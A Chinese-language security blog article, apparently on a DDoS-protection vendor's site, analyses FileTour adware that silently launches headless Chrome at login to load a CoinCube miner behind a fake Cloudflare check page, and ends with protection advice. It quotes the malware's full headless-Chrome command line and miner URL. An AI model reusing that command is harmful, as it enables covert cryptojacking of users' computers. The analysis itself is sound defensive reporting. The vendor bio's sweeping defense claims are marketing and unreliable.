DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿

09-17 WEB安全

FileTour是一种广告软件,通常作为游戏和其他软件的破解或欺骗手段传播。这个软件包是界定于广告软件和PUP以及更危险的计算机感染类型(如密码窃取木马和矿工)之间,也因此而臭名昭著。
此广告软件包可以创建Windows自动运行,当用户登录到Windows时,它会自动启动Chrome并连接到浏览器内的挖掘页面。更糟糕的是,用户并不能直接发现这些操作。

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿


用于启动Headless Chrome的命令行
用户登录Windows时用于启动Chrome的命令是:
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4
该命令将导致chrome以不可见的状态打开,无需GPU硬件加速,可以在端口9222上启用远程调试,并自动连接到https://de-mi-nis-ner2.info/cdn-41.html?t=0.4网页。
当浏览器在后台打开此页面时,它将执行嵌入式JavaScript,以启动CoinCube浏览器内矿工脚本。这会导致Chrome在任务管理器中激活高达70-80%的CPU利用率。

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿


任务管理器显示Chrome CPU利用率
正如你所看到的,通过使用浏览器的矿工窗口,大多数人甚至不会注意到他们感染了任何东西。是的,他们的电脑可能会感觉很慢,有些甚至可能会检查任务管理器,并注意到Chrome的奇怪行为,但对于大多数用户而言,该矿工可以运行数天而不被检测到。
浏览器挖矿页面页面假装为Cloudflare验证页面
虽然大多数人不会在正常浏览器窗口中实际查看正在打开的网站,但我当然会看一看。有趣的是,这个页面假装是一个Cloudflare反DDoS验证页面,要求访问者确认他们是人类。

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿


假Cloudflare反DDoS验证页面
即使此页面看起来像合法的Cloudflare验证页面,单击此复选框也不会执行任何操作。此外,源代码清楚地显示CoinCube脚本正在加载,这不是Cloudflare正在做的事情。

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿


显示CoinCube代码的来源
保护用户免受浏览器内的矿工的侵害
挖矿软件正在成为一种流行病,而浏览器内置矿工的行为也会越来越猖獗。因此,用户通过安装防病毒软件来保护自己是非常重要的,这些防病毒软件可以检测浏览器何时连接到CoinCube等已知的挖掘服务。
不幸的是,新浏览器挖矿行为不断涌现,它已成为安全行业的重头戏。因此,您安装的软件可能无法检测与新的浏览器内矿工关联的网址或脚本。
要增加进一步的保护,您可以在Chrome中使用adblocker,这会阻止浏览器内挖掘脚本。此外,您还可以使用  CoinBlockerLists  网站下载与浏览器内挖掘相关的IP地址和域列表。
 

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://sskjddosgb11.ddosgb.com//web/94.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 698415访问次数
  • 建站天数
  • 友情链接

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X